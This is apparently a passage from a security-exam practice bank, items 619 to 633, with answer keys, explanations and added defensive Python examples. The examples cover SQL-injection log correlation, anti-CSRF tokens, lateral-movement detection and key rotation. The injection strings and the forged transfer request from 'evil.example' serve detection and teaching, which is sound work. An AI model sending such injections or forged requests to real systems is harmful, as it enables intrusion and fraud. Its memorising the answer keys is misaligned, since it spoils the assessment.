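    """True if any decoded parameter value matches a known injection shape."""
    for value in decoded_params(uri).values():
        if any(p.search(value) for p in SQLI_PATTERNS):
            return True
    return False


def parse_waf(text):
    """Turn each key=value line into a dict."""
    return [dict(kv.split("=", 1) for kv in line.split()) for line in text.splitlines()]


def correlate(access_text, waf_text):
    """For each suspicious request, report the HTTP status the app returned and
    what the WAF did with it ("not seen" if the WAF has no record of it)."""
    verdicts = {(e["src"], unquote_plus(e["uri"])): e["action"] for e in parse_waf(waf_text)}
    findings = []
    for line in access_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m or not looks_like_sqli(m["uri"]):
            continue
        uri = unquote_plus(m["uri"])
        findings.append({
            "src": m["src"],
            "uri": uri,
            "status": int(m["status"]),
            "waf_action": verdicts.get((m["src"], uri), "not seen"),
        })
    return findings
```

Running `correlate(ACCESS_LOG, WAF_LOG)` on the constructed data returns two findings from 203.0.113.45: the `1 OR 1=1` request was only logged by the WAF and reached the application (HTTP 500, matching the reported error page), while the UNION attempt was blocked (HTTP 403). That is exactly the confirmation the question asks for, and a "not seen" verdict would tell you the request bypassed the WAF entirely.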

619
MCQmedium

A customer portal has a form that submits a money-transfer request with the user’s existing session cookie. Security testing shows that if a user visits a malicious site while logged in, the portal will submit the transfer request without any additional verification. Which control would best reduce this risk?

A.Replace the transfer form with a stored procedure
B.Add a server-validated anti-CSRF token to each state-changing request
C.Enable input length limits on the transfer amount field
D.Turn on content security policy to block all script execution
AnswerB

An anti-CSRF token is the best control because it ties the request to the legitimate application session and makes it difficult for an attacker-controlled site to forge the request successfully. State-changing actions such as transfers should validate a unique token on the server side, ideally with other browser protections like SameSite cookies. This directly addresses cross-site request forgery.

Why this answer

The described attack is a Cross-Site Request Forgery (CSRF), where a malicious site forces an authenticated user's browser to submit a state-changing request without the user's consent. Adding a server-validated anti-CSRF token ensures that each request includes a unique, unpredictable value tied to the user's session, which the server verifies before processing. This prevents the malicious site from forging a valid request because it cannot guess or obtain the token.

Exam trap

The trap here is that candidates may confuse CSRF with XSS or session hijacking, and incorrectly choose input validation or stored procedures, not realizing that the core vulnerability is the lack of origin verification for state-changing requests.

How to eliminate wrong answers

Option A is wrong because replacing the transfer form with a stored procedure addresses database injection or logic issues, not the lack of request origin verification; a stored procedure does not prevent a malicious site from submitting a forged request with the user's session cookie. Option C is wrong because input length limits on the transfer amount field only restrict the size of the input data, which does nothing to verify that the request originated from the legitimate portal rather than a cross-site source. Option D is wrong because a content security policy is enforced by the browser on the portal's own pages and has no effect on the attacker's page; a CSRF request can be triggered by a plain HTML form or image tag without any script, so blocking script execution does not stop the forged request, and blocking all scripts would also break the portal itself.
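Added example (not code from the original page or any real portal): a synchronizer anti-CSRF token checked on the server for the transfer endpoint, with the vulnerable handler beside the hardened one. The in-memory session store, the request dict shape, the origin name and the handler names are assumptions made for illustration; a real application would use its framework's session and form handling.

```python
"""Anti-CSRF synchronizer token: vulnerable handler beside the protected one.

Session store, request layout and names are constructed for this example."""
import hmac
import secrets

# Constructed stand-ins for a real framework's session store and audit log.
SESSIONS = {}   # session id -> {"user": ..., "csrf": ...}
TRANSFERS = []  # (user, recipient, amount) records that were accepted


def login(user):
    """Create a session and a per-session CSRF token that only the server
    and the legitimate page ever see."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def transfer_form_token(sid):
    """Value the portal embeds in its transfer form as a hidden field."""
    return SESSIONS[sid]["csrf"]


def transfer_vulnerable(request):
    """Before: the session cookie alone authorizes the transfer. The browser
    attaches that cookie to a request from any site, so a forged form works."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return 401
    TRANSFERS.append((session["user"], request["form"]["to"], request["form"]["amount"]))
    return 200


def transfer_protected(request, allowed_origin="https://portal.example"):
    """After: the request must carry the token bound to this session. An
    attacker's page cannot read it (same-origin policy), so it cannot forge it."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return 401
    # Defence in depth: browsers add Origin to cross-site POSTs; reject mismatches.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != allowed_origin:
        return 403
    submitted = request["form"].get("csrf_token", "")
    # Constant-time comparison so a token cannot be guessed byte by byte via timing.
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403
    TRANSFERS.append((session["user"], request["form"]["to"], request["form"]["amount"]))
    return 200


def demo():
    """Legitimate submission versus forged ones from an attacker-controlled site."""
    sid = login("alice")
    legit = {"cookies": {"sid": sid}, "headers": {"Origin": "https://portal.example"},
             "form": {"to": "bob", "amount": "25", "csrf_token": transfer_form_token(sid)}}
    # Cross-site form post: the browser still sends alice's cookie, but the
    # attacker cannot read her token and can only guess one.
    forged = {"cookies": {"sid": sid}, "headers": {"Origin": "https://evil.example"},
              "form": {"to": "mallory", "amount": "9999", "csrf_token": secrets.token_urlsafe(32)}}
    # Same attack with no Origin header at all: the token check still catches it.
    forged_no_origin = {"cookies": {"sid": sid}, "headers": {},
                        "form": {"to": "mallory", "amount": "9999"}}
    return {
        "vulnerable_forged": transfer_vulnerable(forged),
        "protected_legit": transfer_protected(legit),
        "protected_forged": transfer_protected(forged),
        "protected_forged_no_origin": transfer_protected(forged_no_origin),
    }
```

`demo()` shows the vulnerable handler accepting the forged transfer (200) while the protected handler accepts only the legitimate one and rejects both forged variants (403). The Origin check is deliberately secondary: some clients omit the header, so the token comparison is the control that must always run. Setting the session cookie with `SameSite=Lax` or `Strict`, as the explanation above suggests, is a further layer, but it lives on the cookie rather than in this handler.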

620
MCQmedium

An HR department hires contractors for fixed 60-day engagements. Accounts should stop working automatically when the engagement ends, and any rehire should require fresh approval rather than restoring old access. What IAM control is the best fit?

A.Use one shared contractor account and rotate the password when people leave.
B.Configure an account expiration date and automatic deprovisioning tied to the approved role.
C.Disable the account after the contract ends but keep all group memberships unchanged.
D.Create a local workstation account so the contractor does not need centralized identity services.
AnswerB

Correct. Time-bound accounts with automatic deprovisioning are designed for contractors and other temporary users. They enforce least privilege over time, remove access when the engagement ends, and force a new approval process for any future engagement. This reduces the risk of forgotten accounts and prevents accidental restoration of access without review.

Why this answer

Option B is correct because configuring an account expiration date and automatic deprovisioning tied to the approved role directly enforces the 60-day limit and ensures that when the engagement ends, the account is automatically disabled or removed. This approach also supports the requirement that rehire requires fresh approval, as the old account is deprovisioned and cannot be simply re-enabled without going through the provisioning process again.

Exam trap

The trap here is that candidates may choose Option C thinking that disabling the account is sufficient, but they overlook the requirement that rehire must require fresh approval, which is violated if group memberships remain intact and could be restored without re-provisioning.

How to eliminate wrong answers

Option A is wrong because using a shared contractor account violates the principle of individual accountability and non-repudiation, and rotating the password when someone leaves does not automatically disable access at the end of the 60-day engagement. Option C is wrong because disabling the account after the contract ends but keeping all group memberships unchanged means that if the account is ever re-enabled (even accidentally), the contractor would immediately regain all previous permissions without fresh approval, violating the requirement for rehire requiring fresh approval. Option D is wrong because creating a local workstation account bypasses centralized identity management, making it impossible to enforce automatic expiration, deprovisioning, or role-based access control across the organization.

621
Multi-Selecteasy

Which two are detective controls? Select two.

Select 2 answers
A.Security camera monitoring an entrance
B.Log review in a SIEM
C.Locked server rack
D.Employee security awareness training
E.Disk encryption on a laptop
AnswersA, B

Cameras help observe and detect suspicious activity after it occurs.

Why this answer

Security camera monitoring an entrance is a detective control because it records events as they occur, providing evidence after the fact. It does not prevent unauthorized access but instead detects and documents incidents for review. Log review in a SIEM is detective for the same reason: it identifies suspicious activity from collected evidence and raises alerts rather than stopping the activity itself. Both align with the detective control function of identifying and alerting on security events.

Exam trap

The trap here is confusing preventive controls (like locks or encryption) with detective controls, as candidates often misclassify physical security measures as detective rather than preventive.

622
MCQmedium

A legacy payroll server contains a critical vulnerability. The vendor says a patch is 45 days away, and the system must remain available for payroll processing. Which risk treatment is the best short-term choice?

A.Accept the risk until the patch arrives because the server is needed for payroll processing.
B.Mitigate the risk with compensating controls such as segmentation, restricted access, and monitoring.
C.Avoid the risk by permanently decommissioning the server this week.
D.Transfer the risk by purchasing support coverage and waiting for the patch.
AnswerB

Mitigation is the best short-term treatment because the server must remain available and the vendor cannot patch it yet. Compensating controls can reduce exposure by limiting who can reach the system, narrowing network paths, and improving detection. This lowers likelihood without shutting down payroll operations. It is the most practical choice when full remediation is delayed.

Why this answer

Option B is correct because compensating controls like network segmentation, strict access controls, and enhanced monitoring can reduce the risk of exploitation while keeping the legacy payroll server operational. This approach directly addresses the need for availability during the 45-day patch window, aligning with the principle of defense-in-depth for unpatched systems.

Exam trap

The trap here is that candidates may confuse 'accepting the risk' (Option A) as a valid short-term strategy, but CompTIA expects you to recognize that acceptance without active monitoring or controls is not appropriate when the vulnerability is critical and the system handles sensitive data.

How to eliminate wrong answers

Option A is wrong because accepting the risk without any active countermeasures leaves the critical vulnerability exposed, which could lead to a breach of sensitive payroll data; acceptance is only appropriate when the impact is negligible, which is not the case here. Option C is wrong because permanently decommissioning the server avoids the risk but violates the requirement that the system must remain available for payroll processing, making it an impractical short-term choice. Option D is wrong because purchasing support coverage does not transfer the technical risk of exploitation; it only provides vendor support, and waiting for the patch still leaves the vulnerability unmitigated during the 45-day period.

623
MCQeasy

NetFlow shows one workstation opening SMB connections to a dozen internal servers and then attempting many WinRM connections. What is the most likely explanation?

A.The host is likely being used for lateral movement or internal reconnaissance.
B.The workstation is probably downloading a routine operating system update.
C.The network is likely suffering from a wireless interference problem.
D.The user is likely printing documents to multiple shared printers.
AnswerA

That pattern suggests a compromised system probing nearby hosts and trying to spread access.

Why this answer

SMB connections to many internal servers followed by WinRM attempts is a classic pattern of lateral movement or internal reconnaissance. An attacker or compromised host uses SMB to enumerate hosts and accessible shares and then leverages WinRM for remote command execution, a sequence that post-exploitation tools such as PsExec and CrackMapExec automate.

Exam trap

The trap here is that candidates may mistake the SMB traffic for normal file sharing or printing, overlooking that WinRM is a remote execution protocol, not a file or print service, and thus the combination signals active reconnaissance or lateral movement.

How to eliminate wrong answers

Option B is wrong because routine OS updates are fetched over HTTP/S from Windows Update or an internal WSUS server, not through SMB connections to a dozen internal servers followed by WinRM. Option C is wrong because wireless interference would cause connectivity issues, not a specific pattern of SMB then WinRM traffic. Option D is wrong because printing to shared printers uses SMB for print spooling but does not involve WinRM connections, which are for remote management and command execution.
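Added example, not from the original page: a detector that applies the reasoning above to flow records, raising an alert only when the same source shows SMB fan-out to many internal hosts and then WinRM attempts within a short window. The CSV layout, addresses, packet counts and thresholds are constructed assumptions to be tuned against your own baseline (a backup server or a vulnerability scanner will legitimately fan out over SMB, so the second stage matters).

```python
"""Two-stage lateral-movement detection over NetFlow-like records.

The flow records and thresholds below are constructed for this example."""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORT = 445
WINRM_PORTS = {5985, 5986}

# Constructed flows: one workstation (10.20.5.17) touches twelve servers over
# SMB and then tries WinRM on four of them; 10.20.5.33 is ordinary file/print use.
FLOWS_CSV = "ts,src,dst,dport,packets\n" + "".join(
    f"2025-05-12T09:00:{i // 2 + 1:02d}Z,10.20.5.17,10.20.10.{11 + i},445,9\n" for i in range(12)
) + """\
2025-05-12T09:01:10Z,10.20.5.17,10.20.10.11,5985,4
2025-05-12T09:01:11Z,10.20.5.17,10.20.10.12,5985,4
2025-05-12T09:01:12Z,10.20.5.17,10.20.10.13,5986,4
2025-05-12T09:01:13Z,10.20.5.17,10.20.10.14,5985,4
2025-05-12T09:05:00Z,10.20.5.33,10.20.10.50,445,340
2025-05-12T09:05:30Z,10.20.5.33,10.20.10.51,445,120
2025-05-12T09:06:00Z,10.20.5.33,10.20.10.60,9100,20
"""


def parse_flows(text):
    """Read the CSV into dicts with an aware datetime and integer fields."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        rows.append({
            "ts": datetime.fromisoformat(row["ts"].replace("Z", "+00:00")),
            "src": row["src"],
            "dst": row["dst"],
            "dport": int(row["dport"]),
            "packets": int(row["packets"]),
        })
    return rows


def detect_lateral_movement(text, smb_fanout=5, winrm_min=3, window=timedelta(minutes=10)):
    """Alert on sources with >= smb_fanout distinct SMB targets followed by
    >= winrm_min WinRM flows inside `window` of the first SMB contact."""
    by_src = defaultdict(list)
    for flow in parse_flows(text):
        by_src[flow["src"]].append(flow)

    alerts = {}
    for src, flows in by_src.items():
        smb = [f for f in flows if f["dport"] == SMB_PORT]
        smb_targets = {f["dst"] for f in smb}
        if len(smb_targets) < smb_fanout:
            continue  # stage one not met: no fan-out
        first_smb = min(f["ts"] for f in smb)
        winrm = [f for f in flows
                 if f["dport"] in WINRM_PORTS and first_smb <= f["ts"] <= first_smb + window]
        if len(winrm) < winrm_min:
            continue  # fan-out alone could be backups or scanning
        alerts[src] = {
            "smb_targets": len(smb_targets),
            "winrm_attempts": len(winrm),
            "winrm_targets": sorted({f["dst"] for f in winrm}),
        }
    return alerts
```

On the constructed data only 10.20.5.17 is flagged (12 SMB targets, 4 WinRM attempts); the file-share and print traffic from 10.20.5.33 never reaches the fan-out threshold. In a SIEM you would add a baseline exemption for hosts that are expected to fan out (backup, patching, scanners) rather than lowering the thresholds.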

624
MCQhard

A vulnerability scan of a Linux application server reports these findings: OpenSSL 3.0.7 is flagged with a critical CVE, but the distribution vendor note says the fix was backported. Port 8443 is bound to all interfaces, yet a firewall blocks it from the internet. The internal admin console on that port still uses the default admin/admin credentials and is reachable from the corporate VLAN. Which issue should be remediated first?

A.Upgrade OpenSSL immediately, because the reported CVE proves the package is exploitable as installed.
B.Ignore the 8443 service, because the internet firewall already prevents external exposure.
C.Change the default credentials on the internal admin console and restrict access to only approved management hosts.
D.Leave the console as-is and focus only on changing the bind address to 127.0.0.1.
AnswerC

Default credentials on a reachable administrative interface are the highest-risk issue in the list. The console is accessible from the corporate VLAN, so an internal attacker or compromised endpoint could log in immediately without needing a vulnerability exploit. The OpenSSL finding may be a false positive due to backporting, and the firewall already limits internet reach, but default admin/admin credentials create direct compromise risk.

Why this answer

Option C is correct because the most immediate risk is that an attacker on the corporate VLAN can access the internal admin console using default credentials (admin/admin). This bypasses the firewall and allows full control of the application server. Even though OpenSSL has a backported fix, the default credentials represent an active, easily exploitable vulnerability that requires no additional exploit development.

Exam trap

The trap here is that candidates focus on the critical CVE and the firewall rule, overlooking that default credentials on an internally reachable service pose a more immediate and easily exploitable risk than a patched vulnerability or a network control that does not protect against internal threats.

How to eliminate wrong answers

Option A is wrong because the distribution vendor has backported the fix, so the installed OpenSSL 3.0.7 is patched despite the version string the scanner keys on; confirm that against the distribution's security advisory or the package changelog rather than trusting the scanner or the version number alone, then record the finding as a false positive. Upgrading outside the distribution's packaging is unnecessary and could break dependencies. Option B is wrong because the firewall only blocks internet traffic, but the admin console is reachable from the corporate VLAN, which is a trusted network that may still contain compromised hosts or insider threats. Option D is wrong because changing the bind address to 127.0.0.1 alone does not address the default credentials; an attacker on the local host could still use them, and the console would remain accessible to anyone who gains local access.

625
MCQmedium

Network engineers need to administer internal switches from home. The company wants encrypted management traffic, strong user verification, and no management ports exposed directly to the internet. Which approach is best?

A.Require a VPN or ZTNA connection with MFA, then allow SSH or HTTPS management only through that protected tunnel.
B.Expose SSH on the internet and rely on key-based authentication alone.
C.Use RDP with port forwarding because it is simpler for remote support.
D.Allow split tunneling without MFA so engineers can reduce latency while working remotely.
AnswerA

A protected remote-access layer keeps management services off the public internet while preserving encryption and strong authentication.

Why this answer

Option A is correct because it enforces encryption (via VPN or ZTNA tunnel), strong user verification (MFA), and network segmentation (no direct internet exposure). SSH or HTTPS management traffic is then allowed only through the protected tunnel, ensuring confidentiality, integrity, and access control. This aligns with the principle of defense in depth for remote network device administration.

Exam trap

The trap here is that candidates may think SSH key-based authentication alone is sufficient for remote access, overlooking the requirement to avoid direct internet exposure and the need for strong user verification like MFA.

How to eliminate wrong answers

Option B is wrong because exposing SSH directly to the internet violates the requirement of no management ports exposed to the internet, and key-based authentication alone does not provide strong user verification (e.g., no MFA). Option C is wrong because RDP is not designed for switch management (switches typically lack RDP support) and port forwarding still exposes the management port to the internet, violating the exposure restriction. Option D is wrong because split tunneling without MFA bypasses the encrypted tunnel requirement and weakens user verification, leaving management traffic potentially exposed and vulnerable to interception.

626
MCQmedium

A help desk technician reviews a voicemail in which the caller claims to be from the security team, says the user will be locked out unless they read back a one-time passcode, and leaves a callback number. What type of attack is this?

A.Smishing, because the attacker is using a text message with a link.
B.Vishing, because the attacker is using voice communication to pressure the user.
C.Baiting, because the attacker is offering a reward to entice the user.
D.Pretexting, because the attacker invented a role and story.
AnswerB

Vishing is voice-based social engineering, including phone calls and voicemail messages that try to pressure the target into revealing information. Requesting a one-time passcode is especially dangerous because it can let an attacker bypass MFA protections. The callback number is often used to appear legitimate and keep the victim engaged long enough to disclose sensitive data.

Why this answer

Option B is correct because vishing (voice phishing) uses voice communication—such as phone calls or voicemails—to trick victims into revealing sensitive information. In this scenario, the attacker leaves a voicemail claiming to be from the security team and pressures the user to read back a one-time passcode, which is a classic vishing tactic that exploits trust and urgency over voice channels.

Exam trap

The trap here is that candidates may confuse vishing with smishing because both involve social engineering over digital communication, but the key differentiator is the medium: voice (voicemail/call) versus text message (SMS).

How to eliminate wrong answers

Option A is wrong because smishing specifically involves SMS text messages, often containing a malicious link, not a voicemail or callback number. Option C is wrong because baiting relies on offering a reward (e.g., free download or USB drive) to entice the victim into an action, not on impersonating authority and creating urgency to extract a passcode. Option D is a partial description rather than the best answer: the caller does use a pretext (a fabricated role and story), but pretexting is the technique that supports the attack, while the attack is classified by its delivery channel, and a voicemail with a callback number makes it vishing.

627
MCQeasy

An employee receives an email that appears to come from the HR team. It says their payroll account will be suspended unless they click a link and sign in within 30 minutes. What type of attack is this most likely?

A.Smishing
B.Phishing
C.Vishing
D.Pretexting
AnswerB

Phishing uses deceptive messages to trick a user into clicking a link, entering credentials, or taking another unsafe action. This email pretends to be from HR, creates urgency, and tries to push the user into signing in on a fake page.

Why this answer

This is a classic phishing attack because the threat actor uses a deceptive email message to trick the recipient into clicking a malicious link and providing sensitive credentials. Phishing specifically refers to social engineering attacks delivered via email, often leveraging urgency and impersonation of a trusted entity like HR to bypass the victim's critical thinking.

Exam trap

The trap here is that candidates often confuse phishing with vishing or smishing because all three involve impersonation and urgency, but the specific delivery vector (email vs. SMS vs. voice call) is the key differentiator the exam expects you to identify.

How to eliminate wrong answers

Option A is wrong because smishing is a social engineering attack delivered via SMS (Short Message Service) text messages, not email. Option C is wrong because vishing (voice phishing) is conducted over voice calls or VoIP, not through an email message. Option D is wrong because pretexting is a social engineering technique where the attacker fabricates a scenario (pretext) to steal information, but it does not inherently involve a phishing link or email; the attack described specifically uses an email with a link, which is the hallmark of phishing.

628
MCQmedium

A company suspects the master encryption key used by a cloud storage service may have been exposed. The data must remain protected if someone later obtains a copy of the old key. What is the best next step?

A.Delete the stored files so the exposed key can no longer be used.
B.Rotate the key and re-encrypt or rewrap the protected data under the new key.
C.Change every user's password because that will also invalidate the exposed encryption key.
D.Increase file compression so the data becomes harder to read.
AnswerB

If a key may be compromised, the secure response is to replace it and move protected data to fresh key material. Rotating the key prevents the old key from being useful going forward, and re-encrypting or rewrapping ensures the data is actually protected by the new key. This reduces the risk that a future attacker can use the leaked key to access stored content.

Why this answer

Key rotation is the correct response because it generates new key material and moves the protected data onto it, either by re-encrypting the data or by rewrapping the data keys under the new key. Once that is done, a copy of the old key no longer decrypts anything current. Note that in a key management service such as AWS KMS or Azure Key Vault, automatic rotation creates a new key version but keeps the old versions so existing ciphertext still decrypts; it does not by itself re-protect data already encrypted, so the rewrap or re-encryption step is still required, and any ciphertext the attacker may already have copied remains decryptable with the old key.

Exam trap

The trap here is that candidates often confuse key rotation with password changes or data deletion, failing to recognize that encryption key management requires cryptographic operations to re-protect the data, not just administrative actions like deleting files or changing user credentials.

How to eliminate wrong answers

Option A is wrong because deleting the stored files does not address the exposure of the key itself; the data is lost, but the key exposure remains a risk for any future data encrypted with that key, and it is an extreme measure that disrupts business operations. Option C is wrong because user passwords are unrelated to the master encryption key; changing passwords affects authentication but does not change the cryptographic key used to encrypt the data. Option D is wrong because file compression does not alter the encryption key or the ciphertext; it only reduces file size and does not provide any security against an attacker who possesses the old key.
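Added example (not from the original page and not any cloud provider's API): envelope encryption in which rotating the key-encryption key (KEK) rewraps the per-object data keys (DEKs) without touching the bulk ciphertext, plus the full re-encryption path for when a DEK itself may have leaked. The cipher below is a simple HMAC-SHA256 encrypt-then-MAC construction chosen only so the example runs on the standard library; it is not a substitute for AES-GCM or a real KMS. The store class, object names and sample data are assumptions.

```python
"""Envelope encryption: rotate the KEK and rewrap DEKs, or re-encrypt the data.

The toy cipher, store and sample data are constructed for this example."""
import hashlib
import hmac
import secrets


def _stream(key, nonce, length):
    """Keystream from HMAC-SHA256 over (nonce || counter) blocks."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """Encrypt-then-MAC with separate derived keys; returns nonce || ct || tag."""
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    nonce = secrets.token_bytes(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _stream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def open_(key, blob):
    """Verify the tag before decrypting; raises ValueError under the wrong key."""
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed: wrong key or tampered data")
    return bytes(a ^ b for a, b in zip(ct, _stream(enc_key, nonce, len(ct))))


class Store:
    """Each object is encrypted under its own DEK; DEKs are wrapped by the KEK.
    Only wrapped DEKs and ciphertext are persisted; the KEK stays in the KMS."""

    def __init__(self, kek):
        self.kek = kek
        self.objects = {}  # name -> {"wrapped_dek": bytes, "blob": bytes}

    def put(self, name, data):
        dek = secrets.token_bytes(32)
        self.objects[name] = {"wrapped_dek": seal(self.kek, dek), "blob": seal(dek, data)}

    def get(self, name, kek=None):
        obj = self.objects[name]
        dek = open_(kek or self.kek, obj["wrapped_dek"])
        return open_(dek, obj["blob"])

    def rotate_kek(self):
        """Suspected KEK exposure: mint a new KEK and rewrap every DEK. The bulk
        ciphertext is untouched, so this is cheap even for very large objects."""
        old_kek, self.kek = self.kek, secrets.token_bytes(32)
        for obj in self.objects.values():
            obj["wrapped_dek"] = seal(self.kek, open_(old_kek, obj["wrapped_dek"]))
        return old_kek

    def reencrypt(self, name):
        """Suspected DEK exposure, or ciphertext already copied along with the old
        wrapped DEK: rewrapping is not enough, re-encrypt under a fresh DEK."""
        self.put(name, self.get(name))


def wrong_key_rejected():
    """True when data sealed under one key fails to open under another."""
    try:
        open_(b"\x02" * 32, seal(b"\x01" * 32, b"x"))
    except ValueError:
        return True
    return False


def demo():
    store = Store(secrets.token_bytes(32))
    store.put("payroll.csv", b"alice,5000\nbob,4800\n")
    old_kek = store.rotate_kek()
    try:
        store.get("payroll.csv", kek=old_kek)
        old_kek_still_works = True
    except ValueError:
        old_kek_still_works = False
    return {"readable_after_rotation": store.get("payroll.csv") == b"alice,5000\nbob,4800\n",
            "old_kek_still_works": old_kek_still_works}
```

After `rotate_kek()` the data still reads under the new KEK and the old KEK fails authentication on every wrapped DEK, which is the "rewrap" outcome the explanation describes. The `reencrypt` path exists because rewrapping protects only against future use of the old KEK: an attacker who already copied both the old wrapped DEK and the ciphertext can still decrypt that copy, and only a fresh DEK over the data closes that gap for anything they copy later.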

629
Multi-Selectmedium

A security operations center (SOC) analyst is investigating a potential malware outbreak. Which three of the following indicators of compromise (IOCs) would provide the strongest evidence of malicious activity? (Choose three.)

Select 3 answers
A.An outbound connection from an internal workstation to a known command-and-control (C2) IP address
B.A hash of a file that matches a known malware signature in a threat intelligence feed
C.A registry key modification that creates a run key for persistence on a system
D.An increase in legitimate web traffic to a corporate website from a new geographic region
E.A user reporting a slow computer that started after installing a software update
F.A single failed login attempt on a user account from an internal IP address
AnswersA, B, C

Why this answer

An outbound connection to a known C2 IP address is the strongest kind of indicator because it shows the host actively communicating with attacker infrastructure, which is rarely seen in legitimate traffic, especially when the address is listed as malicious in a threat intelligence feed. A file hash that matches a known malware signature is equally objective: the hash identifies the exact file regardless of its name or location. A newly created run key is a common persistence mechanism, and its appearance alongside the other two indicators completes the picture of an infection that has established itself and is calling home.

Exam trap

The exam often tests the distinction between anecdotal user reports and objective technical IOCs, where candidates mistakenly treat a user complaint or a single benign event as strong evidence of compromise.

630
MCQmedium

A user reports receiving repeated MFA push requests even though they are not logging in. Later, someone calls and claims to be IT, asking the user to approve one prompt so support can finish a password reset. Which control would best reduce the success of this attack?

A.Increase password complexity requirements
B.Use phishing-resistant MFA with number matching or hardware security keys
C.Shorten the screen-lock timeout on user devices
D.Allow users to approve any MFA prompt sent during business hours
AnswerB

These controls require stronger user verification and reduce the chance that a simple push approval will defeat MFA.

Why this answer

Option B is correct because phishing-resistant MFA, such as number matching or hardware security keys (e.g., FIDO2/WebAuthn), prevents an attacker from tricking the user into approving a fraudulent push request. Number matching requires the user to enter a number displayed on the login screen into the MFA prompt, ensuring the approval is tied to an actual authentication attempt the user can see. Hardware security keys use a cryptographic challenge-response bound to the origin of the site being logged into, so there is no push to approve at all and a response captured by a phishing page is not valid for the real service.

Exam trap

The trap here is that candidates often confuse MFA fatigue with password-based attacks and incorrectly choose password complexity (A) or screen-lock timeout (C), failing to recognize that the core vulnerability is the user's ability to approve a push without verifying the context.

How to eliminate wrong answers

Option A is wrong because increasing password complexity does not address MFA fatigue or social engineering; the attacker is already bypassing the password by exploiting the MFA approval process. Option C is wrong because shortening the screen-lock timeout only reduces the risk of unauthorized physical access to an unlocked device, but does not prevent the user from approving a fraudulent MFA prompt on their own device. Option D is wrong because allowing users to approve any MFA prompt during business hours directly enables the attack; it removes the user's discretion and encourages blind approval, which is exactly what the attacker is exploiting.

631
MCQmedium

During an incident, a server administrator needs elevated access to production logs for exactly two hours after manager approval. The organization does not want standing privileged accounts. Which solution is the best fit?

A.Add the administrator to a permanent domain admin group so access is always available.
B.Use just-in-time privileged access through a privileged access management workflow.
C.Create a shared administrator account for the incident team and change the password afterward.
D.Grant access by sending the administrator a VPN profile with broader network reach.
AnswerB

Just-in-time access is ideal when elevation should be temporary, approved, and tightly controlled. A privileged access management workflow can grant the needed permissions for a limited window, automatically revoke them when time expires, and preserve logs for accountability. This reduces the attack surface compared with always-on admin rights while still letting the team respond quickly during an incident.

Why this answer

Just-in-time (JIT) privileged access through a Privileged Access Management (PAM) workflow is the best fit because it grants the administrator elevated permissions for exactly two hours, then automatically revokes them. This aligns with the requirement for time-limited access without maintaining standing privileged accounts, reducing the attack surface and ensuring compliance with the principle of least privilege.

Exam trap

The trap here is that candidates may confuse network-level access (VPN) with privileged access management, or assume a shared account with password rotation is sufficient, overlooking the need for time-bound, auditable, and non-repudiable elevation without standing privileges.

How to eliminate wrong answers

Option A is wrong because adding the administrator to a permanent domain admin group creates a standing privileged account, which the organization explicitly wants to avoid, and provides continuous elevated access rather than time-limited access. Option C is wrong because creating a shared administrator account violates the principle of non-repudiation and auditability, as actions cannot be attributed to a specific individual, and changing the password afterward does not enforce a precise two-hour access window. Option D is wrong because sending a VPN profile with broader network reach only expands network-level access, not privileged access to production logs, and does not provide time-bound elevation or granular control over log permissions.

632
MCQhard

Based on the exhibit, which document type should be updated to make the approval and retention requirements mandatory across the organization?

A.Guideline, because it provides flexible advice without requiring enforcement.
B.Procedure, because it lists the exact steps the help desk follows.
C.Policy, because it sets mandatory rules that apply organization-wide.
D.Architecture diagram, because it shows where documents are stored.
AnswerC

A policy is the right choice because leadership wants the approval and retention expectations to be mandatory, consistent, and auditable across departments. The exhibit shows informal language such as 'should' and 'if time allows,' which is too weak for a control that must be enforced. Policy language establishes the required rule before procedures document how to follow it.

Why this answer

A policy document is the correct choice because it establishes mandatory rules that apply organization-wide, making approval and retention requirements enforceable across all departments. Unlike guidelines or procedures, policies are authoritative and require compliance, which is essential for standardizing security controls like data retention periods.

Exam trap

The trap here is confusing a policy (mandatory, organization-wide) with a guideline (advisory) or procedure (task-specific), leading candidates to pick a document type that lacks enforcement authority.

How to eliminate wrong answers

Option A is wrong because a guideline provides flexible advice or recommendations, not mandatory rules, so it cannot enforce approval or retention requirements. Option B is wrong because a procedure lists specific step-by-step instructions for a task (e.g., help desk ticket handling), but it does not set organization-wide mandatory policies. Option D is wrong because an architecture diagram visually represents system components and data flow, not enforceable rules or retention mandates.

633
MCQ (hard)

A user database is stolen from a SaaS portal. Investigators discover the password column contains the same value for every user who chose "Summer2026!", and an attacker could use precomputed tables to crack weak passwords quickly. Which change best addresses both the repeated-value issue and rainbow-table risk?

A. Encrypt all stored passwords with AES and keep one shared key
B. Use SHA-256 without a salt
C. Store each password with a unique salt and an adaptive hash such as bcrypt or Argon2
D. Add a digital signature to each password record
Answer: C

A unique salt prevents two users with the same password from producing the same stored value, which makes identical passwords harder to spot. Salting also defeats rainbow-table attacks because precomputed hashes no longer match. An adaptive hash adds deliberate computational cost, slowing offline cracking after a breach. Together, these are the standard protections for password storage.

Why this answer

